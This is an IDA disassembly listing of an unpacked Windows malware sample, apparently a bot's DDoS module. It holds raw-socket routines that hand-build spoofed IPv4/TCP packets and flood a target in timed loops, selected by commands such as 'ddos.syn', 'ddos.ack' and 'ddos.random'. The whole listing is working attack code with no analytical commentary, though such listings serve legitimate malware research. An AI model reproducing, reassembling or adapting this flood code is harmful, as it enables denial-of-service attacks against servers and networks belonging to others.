;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : D46FECD7910F9A1F10165C4E124038EF
; File Name : u:\work\d46fecd7910f9a1f10165c4e124038ef_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0006D000 ( 446464.)
; Section size in file : 0006D000 ( 446464.)
; Offset to raw data for section: 00001000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near ; DATA XREF: sub_40CD3A+383C�o
var_494 = byte ptr -494h
var_294 = dword ptr -294h
var_290 = dword ptr -290h
var_28C = byte ptr -28Ch
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_8C = byte ptr -8Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 494h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 0A5h
mov esi, eax
lea edi, [ebp+var_294]
rep movsd
mov dword ptr [eax+290h], 1
call dword_42104C ; GetTickCount
push eax
call sub_415368
lea eax, [ebp+var_18C]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_20C]
push eax
lea eax, [ebp+var_28C]
push eax
call sub_4013E8
push eax
lea eax, [ebp+var_494]
push offset unk_423050
push eax
call sub_415316
xor esi, esi
add esp, 20h
cmp [ebp+var_8], esi
jnz short loc_401090
push esi
lea eax, [ebp+var_494]
push [ebp+var_C]
push eax
lea eax, [ebp+var_10C]
push eax
push [ebp+var_294]
call sub_412BD1
add esp, 14h
loc_401090: ; CODE XREF: start+6E�j
lea eax, [ebp+var_494]
push eax
call sub_40B078
push [ebp+var_290]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
pop edi
pop esi
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B2 proc near ; CODE XREF: sub_4013E8+40�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = byte ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = byte ptr -2Ch
var_2B = byte ptr -2Bh
var_2A = word ptr -2Ah
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_43C99C ; WSAStartup
test eax, eax
jz short loc_4010F2
xor eax, eax
jmp loc_4013BB
; ---------------------------------------------------------------------------
loc_4010F2: ; CODE XREF: sub_4010B2+37�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_43CAC8 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_20], eax
jz loc_4013B3
push esi
lea ecx, [ebp+var_40]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_40], edi
call dword_43CA04 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_4013A9
push [ebp+arg_C]
mov [ebp+var_58], 2
call dword_43CA24 ; ntohs
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_56], ax
mov [ebp+var_54], esi
mov [ebp+var_34], 45h
call dword_43CA24 ; ntohs
push [ebp+arg_C]
mov [ebp+var_32], ax
mov [ebp+var_30], di
mov [ebp+var_2E], bx
mov [ebp+var_2C], 80h
mov [ebp+var_2B], 6
mov [ebp+var_2A], bx
mov [ebp+var_24], esi
call dword_43CA24 ; ntohs
mov [ebp+var_12], ax
call sub_415372
movzx eax, ax
cdq
mov ecx, 401h
idiv ecx
push edx
call dword_43CA24 ; ntohs
push 12345678h
mov [ebp+var_14], ax
call dword_43CA20 ; ntohl
push offset aDdos_syn ; "ddos.syn"
mov [ebp+var_10], eax
push [ebp+arg_8]
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_4011C2
mov [ebp+var_C], ebx
mov [ebp+var_7], 2
jmp short loc_401216
; ---------------------------------------------------------------------------
loc_4011C2: ; CODE XREF: sub_4010B2+105�j
push offset aDdos_ack ; "ddos.ack"
push [ebp+arg_8]
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_4011DE
mov [ebp+var_C], ebx
mov [ebp+var_7], 10h
jmp short loc_401216
; ---------------------------------------------------------------------------
loc_4011DE: ; CODE XREF: sub_4010B2+121�j
push offset aDdos_random ; "ddos.random"
push [ebp+arg_8]
call sub_415730
pop ecx
test eax, eax
pop ecx
jnz short loc_401216
call sub_415372
push 3
cdq
pop ecx
idiv ecx
mov [ebp+var_C], edx
call sub_415372
push 2
cdq
pop ecx
idiv ecx
neg edx
sbb dl, dl
and dl, 0Eh
add dl, cl
mov [ebp+var_7], dl
loc_401216: ; CODE XREF: sub_4010B2+10E�j
; sub_4010B2+12A�j ...
push 4000h
mov [ebp+var_8], 50h
call dword_43CA24 ; ntohs
mov [ebp+var_6], ax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_2], bx
mov [ebp+arg_8], ebx
call dword_421054 ; QueryPerformanceFrequency
lea eax, [ebp+var_1C]
push eax
call dword_421050 ; QueryPerformanceCounter
push [ebp+var_44]
mov eax, [ebp+arg_10]
cdq
push [ebp+var_48]
push edx
push eax
call sub_4157C0
add eax, [ebp+var_1C]
push 14h
pop esi
adc edx, [ebp+var_18]
mov [ebp+var_3C], eax
mov [ebp+var_38], edx
loc_401264: ; CODE XREF: sub_4010B2+2E2�j
; sub_4010B2+2EE�j
mov [ebp+var_4], bx
call sub_415372
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_43CA24 ; ntohs
mov [ebp+var_14], ax
call sub_415372
mov edi, eax
shl edi, 10h
call sub_415372
or edi, eax
push edi
call dword_43CA24 ; ntohs
movzx eax, ax
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_43CA20 ; ntohl
mov [ebp+var_28], eax
mov eax, [ebp+var_24]
push esi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_43CA24 ; ntohs
mov [ebp+var_6E], ax
mov eax, [ebp+var_28]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_4153F0
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_94]
push eax
call sub_4153F0
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40A0E3
mov [ebp+var_4], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_4153F0
lea eax, [ebp+var_14]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_4153F0
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_415390
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40A0E3
mov [ebp+var_2A], ax
lea eax, [ebp+var_34]
push esi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_4153F0
add esp, 14h
lea eax, [ebp+var_58]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_20]
call dword_43CA88 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_4013BF
add [ebp+arg_8], eax
lea eax, [ebp+var_1C]
push eax
call dword_421050 ; QueryPerformanceCounter
mov eax, [ebp+var_18]
cmp eax, [ebp+var_38]
jg short loc_4013A6
jl loc_401264
mov eax, [ebp+var_1C]
cmp eax, [ebp+var_3C]
jb loc_401264
loc_4013A6: ; CODE XREF: sub_4010B2+2E0�j
mov ebx, [ebp+arg_8]
loc_4013A9: ; CODE XREF: sub_4010B2+78�j
; sub_4010B2+334�j
push [ebp+var_20]
call dword_43CABC ; closesocket
pop esi
loc_4013B3: ; CODE XREF: sub_4010B2+5B�j
call dword_43C984 ; WSACleanup
mov eax, ebx
loc_4013BB: ; CODE XREF: sub_4010B2+3B�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_4013BF: ; CODE XREF: sub_4010B2+2CB�j
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset unk_42308C
push eax
call sub_415316
lea eax, [ebp+var_F4]
push eax
call sub_40B078
add esp, 10h
jmp short loc_4013A9
sub_4010B2 endp
; =============== S U B R O U T I N E =======================================
sub_4013E8 proc near ; CODE XREF: start+4F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_409F7A
push [esp+10h+arg_4]
mov esi, eax
call sub_41587F
push [esp+14h+arg_C]
mov ebx, eax
call sub_41587F
mov edi, eax
call sub_415372
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
push [esp+20h+arg_8]
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4010B2
add esp, 20h
test eax, eax
jnz short loc_401435
inc eax
loc_401435: ; CODE XREF: sub_4013E8+4A�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_4013E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401444 proc near ; DATA XREF: sub_40CD3A+3A2F�o
var_3BC = byte ptr -3BCh
var_1BC = dword ptr -1BCh
var_1B8 = byte ptr -1B8h
var_138 = byte ptr -138h
var_B8 = byte ptr -0B8h
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 3BCh
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
xor ebx, ebx
pop ecx
mov esi, eax
lea edi, [ebp+var_1BC]
push 0FFh
inc ebx
push 3
rep movsd
push 2
mov [eax+19Ch], ebx
call dword_43CAA4 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_4014DF
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_423238
push eax
loc_401493: ; DATA XREF: .text:off_424D90�o
; .text:off_425D58�o
call sub_415316
xor edi, edi
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_4014C2
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_412BD1
add esp, 14h
loc_4014C2: ; CODE XREF: sub_401444+5C�j
lea eax, [ebp+var_3BC]
push eax
call sub_40B078
push [ebp+var_38]
call sub_4150F0
pop ecx
pop ecx
push edi
call dword_421048 ; ExitThread
loc_4014DF: ; CODE XREF: sub_401444+3A�j
lea ecx, [ebp+var_C]
push 4
push ecx
xor edi, edi
push 2
push edi
push eax
mov [ebp+var_C], ebx
call dword_43CA04 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_401556
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_3BC]
push offset unk_4231E8
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_24], edi
jnz short loc_401539
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_412BD1
add esp, 14h
loc_401539: ; CODE XREF: sub_401444+D3�j
lea eax, [ebp+var_3BC]
push eax
call sub_40B078
push [ebp+var_38]
call sub_4150F0
pop ecx
pop ecx
push edi
call dword_421048 ; ExitThread
loc_401556: ; CODE XREF: sub_401444+B3�j
lea eax, [ebp+var_1B8]
push eax
call dword_43CA64 ; inet_addr
cmp eax, 0FFFFFFFFh
jnz short loc_4015BD
lea eax, [ebp+var_3BC]
push offset unk_4231B4
push eax
call sub_415316
cmp [ebp+var_24], edi
pop ecx
pop ecx
jnz short loc_4015A0
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_412BD1
add esp, 14h
loc_4015A0: ; CODE XREF: sub_401444+13A�j
lea eax, [ebp+var_3BC]
push eax
call sub_40B078
push [ebp+var_38]
call sub_4150F0
pop ecx
pop ecx
push edi
call dword_421048 ; ExitThread
loc_4015BD: ; CODE XREF: sub_401444+122�j
push 10h
lea eax, [ebp+var_1C]
push edi
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_1C], 2
push edi
call dword_43CA24 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_1B8]
push eax
call dword_43CA64 ; inet_addr
mov esi, dword_42104C
mov [ebp+var_18], eax
mov [ebp+arg_0], edi
call esi ; GetTickCount
mov [ebp+var_8], eax
jmp loc_40171E
; ---------------------------------------------------------------------------
loc_401600: ; CODE XREF: sub_401444+2EB�j
push 41Ch
mov byte_43B238, 45h
call dword_43CA24 ; ntohs
cmp [ebp+var_2C], edi
mov word_43B23A, ax
mov word_43B23C, bx
mov word_43B23E, di
mov byte_43B240, 80h
mov byte_43B241, bl
mov word_43B242, di
jz short loc_40166F
call sub_415372
mov ebx, eax
shl ebx, 8
call sub_415372
add ebx, eax
shl ebx, 8
call sub_415372
add ebx, eax
shl ebx, 8
call sub_415372
add ebx, eax
mov dword_43B244, ebx
xor ebx, ebx
inc ebx
jmp short loc_401687
; ---------------------------------------------------------------------------
loc_40166F: ; CODE XREF: sub_401444+1F9�j
push [ebp+var_1BC]
call sub_40A08A
pop ecx
push eax
call dword_43CA64 ; inet_addr
mov dword_43B244, eax
loc_401687: ; CODE XREF: sub_401444+229�j
mov eax, [ebp+var_18]
mov dword_43B248, eax
call sub_415372
cdq
mov ecx, 100h
idiv ecx
mov byte_43B24C, dl
call sub_415372
cdq
mov ecx, 100h
idiv ecx
mov byte_43B24D, dl
call sub_415372
cdq
mov ecx, 0F0h
push 400h
idiv ecx
mov word_43B24E, di
mov word_43B252, bx
inc edx
mov word_43B250, dx
call sub_415372
cdq
mov ecx, 0FFh
idiv ecx
push edx
push offset dword_43B254
call sub_415390
add esp, 0Ch
lea eax, [ebp+var_1C]
push 10h
push eax
push edi
push 41Ch
push offset byte_43B238
push [ebp+var_4]
call dword_43CA88 ; sendto
cmp eax, 0FFFFFFFFh
jz loc_4017BA
inc [ebp+arg_0]
loc_40171E: ; CODE XREF: sub_401444+1B7�j
call esi ; GetTickCount
sub eax, [ebp+var_8]
mov ecx, 3E8h
xor edx, edx
div ecx
cmp eax, [ebp+var_30]
jbe loc_401600
push [ebp+var_4]
call dword_43CABC ; closesocket
mov eax, [ebp+arg_0]
xor edx, edx
imul eax, 3Ch
mov ecx, eax
shr eax, 0Ah
div [ebp+var_30]
shr ecx, 14h
push ecx
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
lea eax, [ebp+var_138]
push eax
lea eax, [ebp+var_3BC]
push offset unk_423150
push eax
call sub_415316
add esp, 1Ch
cmp [ebp+var_24], edi
jnz short loc_40179D
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_412BD1
add esp, 14h
loc_40179D: ; CODE XREF: sub_401444+337�j
lea eax, [ebp+var_3BC]
push eax
call sub_40B078
push [ebp+var_38]
call sub_4150F0
pop ecx
pop ecx
push edi
call dword_421048 ; ExitThread
loc_4017BA: ; CODE XREF: sub_401444+2D1�j
push [ebp+var_4]
call dword_43CABC ; closesocket
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_1B8]
push [ebp+arg_0]
push eax
push offset unk_4230E8
lea eax, [ebp+var_3BC]
push 200h
push eax
call sub_41588A
add esp, 18h
cmp [ebp+var_24], edi
jnz short loc_401812
push edi
lea eax, [ebp+var_3BC]
push [ebp+var_28]
push eax
lea eax, [ebp+var_B8]
push eax
push [ebp+var_1BC]
call sub_412BD1
add esp, 14h
loc_401812: ; CODE XREF: sub_401444+3AC�j
lea eax, [ebp+var_3BC]
push eax
call sub_40B078
push [ebp+var_38]
call sub_4150F0
pop ecx
pop ecx
push edi
call dword_421048 ; ExitThread
sub_401444 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40182F proc near ; DATA XREF: sub_40CD3A+372D�o
var_414 = byte ptr -414h
var_214 = dword ptr -214h
var_210 = byte ptr -210h
var_190 = byte ptr -190h
var_110 = byte ptr -110h
var_90 = byte ptr -90h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 414h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 85h
mov esi, eax
lea edi, [ebp+var_214]
rep movsd
mov dword ptr [eax+210h], 1
lea eax, [ebp+var_110]
push eax
lea eax, [ebp+var_190]
push eax
lea eax, [ebp+var_210]
push eax
call sub_401B7C
push eax
lea eax, [ebp+var_414]
push offset dword_423280
push eax
call sub_415316
xor esi, esi
add esp, 18h
cmp [ebp+var_8], esi
jnz short loc_4018AC
push esi
lea eax, [ebp+var_414]
push [ebp+var_C]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+var_214]
call sub_412BD1
add esp, 14h
loc_4018AC: ; CODE XREF: sub_40182F+5B�j
lea eax, [ebp+var_414]
push eax
call sub_40B078
push [ebp+var_10]
call sub_4150F0
pop ecx
pop ecx
push esi
call dword_421048 ; ExitThread
pop edi
pop esi
sub_40182F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018CB proc near ; CODE XREF: sub_401B7C+3C�p
var_284 = byte ptr -284h
var_F4 = byte ptr -0F4h
var_B4 = byte ptr -0B4h
var_B3 = byte ptr -0B3h
var_A0 = byte ptr -0A0h
var_94 = byte ptr -94h
var_8C = byte ptr -8Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = byte ptr -70h
var_6F = byte ptr -6Fh
var_6E = word ptr -6Eh
var_58 = dword ptr -58h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = dword ptr -4Ch
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = byte ptr -28h
var_27 = byte ptr -27h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = byte ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = byte ptr -18h
var_17 = byte ptr -17h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 284h
push ebx
push edi
push 0Eh
xor ebx, ebx
pop ecx
xor eax, eax
lea edi, [ebp+var_B3]
mov [ebp+var_B4], bl
rep stosd
stosw
stosb
lea eax, [ebp+var_284]
push eax
push 202h
call dword_43C99C ; WSAStartup
test eax, eax
jz short loc_40190B
xor eax, eax
jmp loc_401B4F
; ---------------------------------------------------------------------------
loc_40190B: ; CODE XREF: sub_4018CB+37�j
xor edi, edi
inc edi
push edi
push ebx
push ebx
push 0FFh
push 3
push 2
call dword_43CAC8 ; WSASocketA
cmp eax, 0FFFFFFFFh
mov [ebp+var_C], eax
jz loc_401B47
push esi
lea ecx, [ebp+var_38]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_38], edi
call dword_43CA04 ; setsockopt
cmp eax, 0FFFFFFFFh
jz loc_401B3D
push 10h
lea eax, [ebp+var_50]
push ebx
push eax
call sub_415390
add esp, 0Ch
mov [ebp+var_50], 2
push [ebp+arg_8]
call dword_43CA24 ; ntohs
mov esi, [ebp+arg_0]
push 28h
mov [ebp+var_4E], ax
mov [ebp+var_4C], esi
mov [ebp+var_20], 45h
call dword_43CA24 ; ntohs
push [ebp+arg_8]
mov [ebp+var_1E], ax
mov [ebp+var_1C], di
mov [ebp+var_1A], bx
mov [ebp+var_18], 80h
mov [ebp+var_17], 6
mov [ebp+var_16], bx
mov [ebp+var_10], esi
call dword_43CA24 ; ntohs
push 4000h
mov [ebp+var_32], ax
mov [ebp+var_2C], ebx
mov [ebp+var_28], 50h
mov [ebp+var_27], 2
call dword_43CA24 ; ntohs
mov [ebp+var_26], ax
lea eax, [ebp+var_40]
push eax
mov [ebp+var_22], bx
mov [ebp+arg_8], ebx
call dword_421054 ; QueryPerformanceFrequency
lea eax, [ebp+var_8]
push eax
call dword_421050 ; QueryPerformanceCounter
push [ebp+var_3C]
mov eax, [ebp+arg_C]
cdq
push [ebp+var_40]
push edx
push eax
call sub_4157C0
add eax, [ebp+var_8]
mov esi, edx
adc esi, [ebp+var_4]
mov [ebp+var_58], eax
loc_4019F6: ; CODE XREF: sub_4018CB+25D�j
; sub_4018CB+269�j
mov [ebp+var_24], bx
call sub_415372
cdq
mov ecx, 3E9h
idiv ecx
add edx, 3E8h
push edx
call dword_43CA24 ; ntohs
mov [ebp+var_34], ax
call sub_415372
mov edi, eax
shl edi, 10h
call sub_415372
or edi, eax
push edi
call dword_43CA24 ; ntohs
movzx eax, ax
mov [ebp+var_30], eax
mov eax, [ebp+arg_4]
inc [ebp+arg_4]
push eax
call dword_43CA20 ; ntohl
push 14h
mov [ebp+var_14], eax
mov eax, [ebp+var_10]
pop edi
push edi
mov [ebp+var_74], eax
mov [ebp+var_70], bl
mov [ebp+var_6F], 6
call dword_43CA24 ; ntohs
mov [ebp+var_6E], ax
mov eax, [ebp+var_14]
mov [ebp+var_78], eax
lea eax, [ebp+var_78]
push 20h
push eax
lea eax, [ebp+var_B4]
push eax
call sub_4153F0
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_94]
push eax
call sub_4153F0
lea eax, [ebp+var_B4]
push 34h
push eax
call sub_40A0E3
mov [ebp+var_24], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_4153F0
lea eax, [ebp+var_34]
push edi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_4153F0
push 4
lea eax, [ebp+var_8C]
push ebx
push eax
call sub_415390
add esp, 44h
lea eax, [ebp+var_B4]
push 28h
push eax
call sub_40A0E3
mov [ebp+var_16], ax
lea eax, [ebp+var_20]
push edi
push eax
lea eax, [ebp+var_B4]
push eax
call sub_4153F0
add esp, 14h
lea eax, [ebp+var_50]
push 10h
push eax
push ebx
lea eax, [ebp+var_B4]
push 28h
push eax
push [ebp+var_C]
call dword_43CA88 ; sendto
cmp eax, 0FFFFFFFFh
jz short loc_401B53
add [ebp+arg_8], eax
lea eax, [ebp+var_8]
push eax
call dword_421050 ; QueryPerformanceCounter
mov eax, [ebp+var_4]
cmp eax, esi
jg short loc_401B3A
jl loc_4019F6
mov eax, [ebp+var_8]
cmp eax, [ebp+var_58]
jb loc_4019F6
loc_401B3A: ; CODE XREF: sub_4018CB+25B�j
mov ebx, [ebp+arg_8]
loc_401B3D: ; CODE XREF: sub_4018CB+78�j
; sub_4018CB+2AF�j
push [ebp+var_C]
call dword_43CABC ; closesocket
pop esi
loc_401B47: ; CODE XREF: sub_4018CB+5B�j
call dword_43C984 ; WSACleanup
mov eax, ebx
loc_401B4F: ; CODE XREF: sub_4018CB+3B�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401B53: ; CODE XREF: sub_4018CB+247�j
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_F4]
push offset dword_4232BC
push eax
call sub_415316
lea eax, [ebp+var_F4]
push eax
call sub_40B078
add esp, 10h
jmp short loc_401B3D
sub_4018CB endp
; =============== S U B R O U T I N E =======================================
sub_401B7C proc near ; CODE XREF: sub_40182F+3C�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
push esi
push edi
push [esp+0Ch+arg_0]
call sub_409F7A
push [esp+10h+arg_4]
mov esi, eax
call sub_41587F
push [esp+14h+arg_8]
mov ebx, eax
call sub_41587F
mov edi, eax
call sub_415372
cdq
mov ecx, 200h
push edi
idiv ecx
push ebx
lea eax, [edx+esi+100h]
push eax
push esi
call sub_4018CB
add esp, 1Ch
test eax, eax
jnz short loc_401BC5
inc eax
loc_401BC5: ; CODE XREF: sub_401B7C+46�j
cdq
mov ecx, 3E8h
idiv ecx
cdq
idiv edi
pop edi
pop esi
pop ebx
retn
sub_401B7C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401BD4 proc near ; DATA XREF: sub_40CD3A+2B63�o
var_440 = byte ptr -440h
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = byte ptr -1BCh
var_13C = byte ptr -13Ch
var_BC = dword ptr -0BCh
var_B8 = dword ptr -0B8h
var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A0 = byte ptr -0A0h
var_9F = byte ptr -9Fh
var_8C = byte ptr -8Ch
var_80 = byte ptr -80h
var_78 = byte ptr -78h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = byte ptr -5Ch
var_5B = byte ptr -5Bh
var_5A = word ptr -5Ah
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = dword ptr -40h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = byte ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = byte ptr -24h
var_23 = byte ptr -23h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 440h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 68h
mov esi, eax
pop ecx
lea edi, [ebp+var_240]
rep movsd
xor esi, esi
push 0Eh
inc esi
xor ebx, ebx
mov [eax+19Ch], esi
pop ecx
xor eax, eax
lea edi, [ebp+var_9F]
mov [ebp+var_A0], bl
rep stosd
stosw
stosb
mov edi, dword_42104C
call edi ; GetTickCount
push eax
call sub_415368
pop ecx
push 0FFh
push 3
push 2
call dword_43CAA4 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_401C9D
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
push offset dword_423450
push eax
call sub_415316
add esp, 0Ch
cmp [ebp+var_A8], ebx
jnz short loc_401C7D
push ebx
lea eax, [ebp+var_440]
push [ebp+var_AC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_240]
call sub_412BD1
add esp, 14h
loc_401C7D: ; CODE XREF: sub_401BD4+84�j
lea eax, [ebp+var_440]
push eax
call sub_40B078
push [ebp+var_BC]
call sub_4150F0
pop ecx
pop ecx
push ebx
call dword_421048 ; ExitThread
loc_401C9D: ; CODE XREF: sub_401BD4+61�j
lea ecx, [ebp+var_34]
push 4
push ecx
push 2
push ebx
push eax
mov [ebp+var_34], esi
call dword_43CA04 ; setsockopt
cmp eax, 0FFFFFFFFh
jnz short loc_401D1B
call dword_43C9B8 ; WSAGetLastError
push eax
lea eax, [ebp+var_440]
